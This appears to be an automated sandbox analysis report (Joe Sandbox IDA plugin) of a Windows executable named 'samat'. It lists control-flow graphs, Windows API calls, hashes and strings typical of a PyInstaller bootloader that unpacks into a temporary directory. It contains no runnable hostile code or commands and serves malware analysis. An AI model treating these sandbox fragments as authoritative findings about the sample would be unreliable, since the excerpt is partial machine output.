                                                                                                                                                                                                                                                                                      control_flow_graph 1014 7ff7e12e5e7c-7ff7e12e5eb1 call 7ff7e12e5588 call 7ff7e12e5590 call 7ff7e12e55f8 1021 7ff7e12e5fef-7ff7e12e605d call 7ff7e12da900 call 7ff7e12e1578 1014->1021 1022 7ff7e12e5eb7-7ff7e12e5ec2 call 7ff7e12e5598 1014->1022 1034 7ff7e12e605f-7ff7e12e6066 1021->1034 1035 7ff7e12e606b-7ff7e12e606e 1021->1035 1022->1021 1027 7ff7e12e5ec8-7ff7e12e5ed3 call 7ff7e12e55c8 1022->1027 1027->1021 1033 7ff7e12e5ed9-7ff7e12e5efc call 7ff7e12da948 GetTimeZoneInformation 1027->1033 1047 7ff7e12e5fc4-7ff7e12e5fee call 7ff7e12e5580 call 7ff7e12e5570 call 7ff7e12e5578 1033->1047 1048 7ff7e12e5f02-7ff7e12e5f23 1033->1048 1039 7ff7e12e60fb-7ff7e12e60fe 1034->1039 1036 7ff7e12e60a5-7ff7e12e60b8 call 7ff7e12dd5fc 1035->1036 1037 7ff7e12e6070 1035->1037 1054 7ff7e12e60c3-7ff7e12e60de call 7ff7e12e1578 1036->1054 1055 7ff7e12e60ba 1036->1055 1041 7ff7e12e6073 1037->1041 1040 7ff7e12e6104-7ff7e12e610c call 7ff7e12e5c00 1039->1040 1039->1041 1045 7ff7e12e6078-7ff7e12e60a4 call 7ff7e12da948 call 7ff7e12cc550 1040->1045 1041->1045 1046 7ff7e12e6073 call 7ff7e12e5e7c 1041->1046 1046->1045 1052 7ff7e12e5f25-7ff7e12e5f2b 1048->1052 1053 7ff7e12e5f2e-7ff7e12e5f35 1048->1053 1052->1053 1059 7ff7e12e5f37-7ff7e12e5f3f 1053->1059 1060 7ff7e12e5f49 1053->1060 1073 7ff7e12e60e5-7ff7e12e60f7 call 7ff7e12da948 1054->1073 1074 7ff7e12e60e0-7ff7e12e60e3 1054->1074 1061 7ff7e12e60bc-7ff7e12e60c1 call 7ff7e12da948 1055->1061 1059->1060 1067 7ff7e12e5f41-7ff7e12e5f47 1059->1067 1064 7ff7e12e5f4b-7ff7e12e5fbf call 7ff7e12ea4d0 * 4 call 7ff7e12e2b5c call 7ff7e12e6114 * 2 1060->1064 1061->1037 1064->1047 1067->1064 1073->1039 1074->1061
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7E12E5EAA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12E55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E560C
                                                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7E12E5EBB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12E5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E55AC
                                                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7E12E5ECC
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12E55C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E55DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12DA948: RtlFreeHeap.NTDLL(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA95E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12DA948: GetLastError.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA968
                                                                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7E12E610C), ref: 00007FF7E12E5EF3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                                      • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                                                      • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                                                      • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                                                                      • Instruction ID: ec6905452d3a93276458e62181b3dfd23d87d646b480793fcc8ea68b0a1b986e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C519276B1864246E711FF31DC826A9E769FB58784FC0813BEA0E83695DFBCE4008761
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                                                      • Instruction ID: 303cc4c16ec65fcddf93b7d255406e535a04841912aebca1591233be52101179
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6F0C822B1878186FB609B60B88A766B354BB84375F840337DAAE12AD4DF7CD059CA05
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1010374628-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 237fa8d459c5d11eae1bba494416b753c006fbba9c027a8b8839988129060696
                                                                                                                                                                                                                                                                                      • Instruction ID: 3c3de33cbddb719382c129076176a23241c35528fba36232b48b9a2c44c46970
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 237fa8d459c5d11eae1bba494416b753c006fbba9c027a8b8839988129060696
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6102C721B1D64641FB62BB119C0337DA688AF41BA0FD58637ED5D8A3D1DEFCA4128336

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 331 7ff7e12c1950-7ff7e12c198b call 7ff7e12c45c0 334 7ff7e12c1991-7ff7e12c19d1 call 7ff7e12c7f90 331->334 335 7ff7e12c1c4e-7ff7e12c1c72 call 7ff7e12cc550 331->335 340 7ff7e12c19d7-7ff7e12c19e7 call 7ff7e12d06d4 334->340 341 7ff7e12c1c3b-7ff7e12c1c3e call 7ff7e12d004c 334->341 346 7ff7e12c19e9-7ff7e12c1a03 call 7ff7e12d4f08 call 7ff7e12c2910 340->346 347 7ff7e12c1a08-7ff7e12c1a24 call 7ff7e12d039c 340->347 344 7ff7e12c1c43-7ff7e12c1c4b 341->344 344->335 346->341 353 7ff7e12c1a26-7ff7e12c1a40 call 7ff7e12d4f08 call 7ff7e12c2910 347->353 354 7ff7e12c1a45-7ff7e12c1a5a call 7ff7e12d4f28 347->354 353->341 361 7ff7e12c1a5c-7ff7e12c1a76 call 7ff7e12d4f08 call 7ff7e12c2910 354->361 362 7ff7e12c1a7b-7ff7e12c1afc call 7ff7e12c1c80 * 2 call 7ff7e12d06d4 354->362 361->341 373 7ff7e12c1b01-7ff7e12c1b14 call 7ff7e12d4f44 362->373 376 7ff7e12c1b16-7ff7e12c1b30 call 7ff7e12d4f08 call 7ff7e12c2910 373->376 377 7ff7e12c1b35-7ff7e12c1b4e call 7ff7e12d039c 373->377 376->341 383 7ff7e12c1b50-7ff7e12c1b6a call 7ff7e12d4f08 call 7ff7e12c2910 377->383 384 7ff7e12c1b6f-7ff7e12c1b8b call 7ff7e12d0110 377->384 383->341 391 7ff7e12c1b9e-7ff7e12c1bac 384->391 392 7ff7e12c1b8d-7ff7e12c1b99 call 7ff7e12c2710 384->392 391->341 393 7ff7e12c1bb2-7ff7e12c1bb9 391->393 392->341 396 7ff7e12c1bc1-7ff7e12c1bc7 393->396 398 7ff7e12c1be0-7ff7e12c1bef 396->398 399 7ff7e12c1bc9-7ff7e12c1bd6 396->399 398->398 400 7ff7e12c1bf1-7ff7e12c1bfa 398->400 399->400 401 7ff7e12c1c0f 400->401 402 7ff7e12c1bfc-7ff7e12c1bff 400->402 404 7ff7e12c1c11-7ff7e12c1c24 401->404 402->401 403 7ff7e12c1c01-7ff7e12c1c04 402->403 403->401 405 7ff7e12c1c06-7ff7e12c1c09 403->405 406 7ff7e12c1c26 404->406 407 7ff7e12c1c2d-7ff7e12c1c39 404->407 405->401 408 7ff7e12c1c0b-7ff7e12c1c0d 405->408 406->407 407->341 407->396 408->404
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C7F90: _fread_nolock.LIBCMT ref: 00007FF7E12C803A
                                                                                                                                                                                                                                                                                      • _fread_nolock.LIBCMT ref: 00007FF7E12C1A1B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7E12C1B6A), ref: 00007FF7E12C295E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                                                      • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                                                      • Opcode ID: 366ee5d3afceab38ba1fccf279b745a5e3150e0a5f226ca546ddb68d3ae287d0
                                                                                                                                                                                                                                                                                      • Instruction ID: 099d9a3fd213d9c3470f2c5f8372f798258e2db17362bb36acf9110826a5232a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 366ee5d3afceab38ba1fccf279b745a5e3150e0a5f226ca546ddb68d3ae287d0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46819171B08682C6EB11EB14D8433F9A398AF48784FC08433EA8D87795DEBCE545D762

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 409 7ff7e12c1600-7ff7e12c1611 410 7ff7e12c1613-7ff7e12c161c call 7ff7e12c1050 409->410 411 7ff7e12c1637-7ff7e12c1651 call 7ff7e12c45c0 409->411 416 7ff7e12c162e-7ff7e12c1636 410->416 417 7ff7e12c161e-7ff7e12c1629 call 7ff7e12c2710 410->417 418 7ff7e12c1682-7ff7e12c169c call 7ff7e12c45c0 411->418 419 7ff7e12c1653-7ff7e12c1681 call 7ff7e12d4f08 call 7ff7e12c2910 411->419 417->416 425 7ff7e12c16b8-7ff7e12c16cf call 7ff7e12d06d4 418->425 426 7ff7e12c169e-7ff7e12c16b3 call 7ff7e12c2710 418->426 434 7ff7e12c16d1-7ff7e12c16f4 call 7ff7e12d4f08 call 7ff7e12c2910 425->434 435 7ff7e12c16f9-7ff7e12c16fd 425->435 433 7ff7e12c1821-7ff7e12c1824 call 7ff7e12d004c 426->433 442 7ff7e12c1829-7ff7e12c183b 433->442 447 7ff7e12c1819-7ff7e12c181c call 7ff7e12d004c 434->447 436 7ff7e12c16ff-7ff7e12c170b call 7ff7e12c1210 435->436 437 7ff7e12c1717-7ff7e12c1737 call 7ff7e12d4f44 435->437 444 7ff7e12c1710-7ff7e12c1712 436->444 448 7ff7e12c1761-7ff7e12c176c 437->448 449 7ff7e12c1739-7ff7e12c175c call 7ff7e12d4f08 call 7ff7e12c2910 437->449 444->447 447->433 453 7ff7e12c1802-7ff7e12c180a call 7ff7e12d4f30 448->453 454 7ff7e12c1772-7ff7e12c1777 448->454 461 7ff7e12c180f-7ff7e12c1814 449->461 453->461 457 7ff7e12c1780-7ff7e12c17a2 call 7ff7e12d039c 454->457 464 7ff7e12c17a4-7ff7e12c17bc call 7ff7e12d0adc 457->464 465 7ff7e12c17da-7ff7e12c17e6 call 7ff7e12d4f08 457->465 461->447 470 7ff7e12c17c5-7ff7e12c17d8 call 7ff7e12d4f08 464->470 471 7ff7e12c17be-7ff7e12c17c1 464->471 472 7ff7e12c17ed-7ff7e12c17f8 call 7ff7e12c2910 465->472 470->472 471->457 473 7ff7e12c17c3 471->473 476 7ff7e12c17fd 472->476 473->476 476->453
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                                                      • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                                                      • Opcode ID: 4ba9704c2667ef3387b8ad085b4ce1cd9035ff509126d6a3bfbf4b4a2ffdb3da
                                                                                                                                                                                                                                                                                      • Instruction ID: 30411cdfb76d1865e385ef329db9a896927d2b266610695e4e2daec76b7fc569
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ba9704c2667ef3387b8ad085b4ce1cd9035ff509126d6a3bfbf4b4a2ffdb3da
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD51AE21B0864386EB15BB119C033AAA358BF84794FD44533EE4C47BA6DFBDE544D722

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(?,?,00000000,00007FF7E12C3CBB), ref: 00007FF7E12C8704
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7E12C3CBB), ref: 00007FF7E12C870A
                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00007FF7E12C3CBB), ref: 00007FF7E12C874C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8830: GetEnvironmentVariableW.KERNEL32(00007FF7E12C388E), ref: 00007FF7E12C8867
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7E12C8889
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12D8238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D8251
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C2810: MessageBoxW.USER32 ref: 00007FF7E12C28EA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                                                      • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                                                      • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                                                                      • Instruction ID: b0f671e3da96fe24b91e5f5725e33ce6cb05d2544f8ab813874516cf45b85df0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6441A312B1964245FB15F725AC5B3BA9258AF847C4FC18133EE0D477D6EEBCE445C222

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 756 7ff7e12c1210-7ff7e12c126d call 7ff7e12cbd80 759 7ff7e12c126f-7ff7e12c1296 call 7ff7e12c2710 756->759 760 7ff7e12c1297-7ff7e12c12af call 7ff7e12d4f44 756->760 765 7ff7e12c12b1-7ff7e12c12cf call 7ff7e12d4f08 call 7ff7e12c2910 760->765 766 7ff7e12c12d4-7ff7e12c12e4 call 7ff7e12d4f44 760->766 777 7ff7e12c1439-7ff7e12c144e call 7ff7e12cba60 call 7ff7e12d4f30 * 2 765->777 772 7ff7e12c12e6-7ff7e12c1304 call 7ff7e12d4f08 call 7ff7e12c2910 766->772 773 7ff7e12c1309-7ff7e12c131b 766->773 772->777 776 7ff7e12c1320-7ff7e12c1345 call 7ff7e12d039c 773->776 785 7ff7e12c1431 776->785 786 7ff7e12c134b-7ff7e12c1355 call 7ff7e12d0110 776->786 793 7ff7e12c1453-7ff7e12c146d 777->793 785->777 786->785 792 7ff7e12c135b-7ff7e12c1367 786->792 794 7ff7e12c1370-7ff7e12c1398 call 7ff7e12ca1c0 792->794 797 7ff7e12c1416-7ff7e12c142c call 7ff7e12c2710 794->797 798 7ff7e12c139a-7ff7e12c139d 794->798 797->785 799 7ff7e12c1411 798->799 800 7ff7e12c139f-7ff7e12c13a9 798->800 799->797 802 7ff7e12c13d4-7ff7e12c13d7 800->802 803 7ff7e12c13ab-7ff7e12c13b9 call 7ff7e12d0adc 800->803 805 7ff7e12c13ea-7ff7e12c13ef 802->805 806 7ff7e12c13d9-7ff7e12c13e7 call 7ff7e12e9e30 802->806 809 7ff7e12c13be-7ff7e12c13c1 803->809 805->794 808 7ff7e12c13f5-7ff7e12c13f8 805->808 806->805 811 7ff7e12c13fa-7ff7e12c13fd 808->811 812 7ff7e12c140c-7ff7e12c140f 808->812 813 7ff7e12c13cf-7ff7e12c13d2 809->813 814 7ff7e12c13c3-7ff7e12c13cd call 7ff7e12d0110 809->814 811->797 815 7ff7e12c13ff-7ff7e12c1407 811->815 812->785 813->797 814->805 814->813 815->776
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                                                      • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                                                      • Opcode ID: 8c3d3767c92c3f25500c132f33d9ae5f36ceff73d91df2c2d10727b506476509
                                                                                                                                                                                                                                                                                      • Instruction ID: 853aabfe5072ced9c79ec08722657eb072b097d7335e90c100d5baa31dfaff51
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c3d3767c92c3f25500c132f33d9ae5f36ceff73d91df2c2d10727b506476509
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A451C422B0868285E720BB11EC423BAE298FF85794FD44133EE4D47B95EEBCE441D712

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7E12DF0AA,?,?,-00000018,00007FF7E12DAD53,?,?,?,00007FF7E12DAC4A,?,?,?,00007FF7E12D5F3E), ref: 00007FF7E12DEE8C
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7E12DF0AA,?,?,-00000018,00007FF7E12DAD53,?,?,?,00007FF7E12DAC4A,?,?,?,00007FF7E12D5F3E), ref: 00007FF7E12DEE98
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                      • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                                                      • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
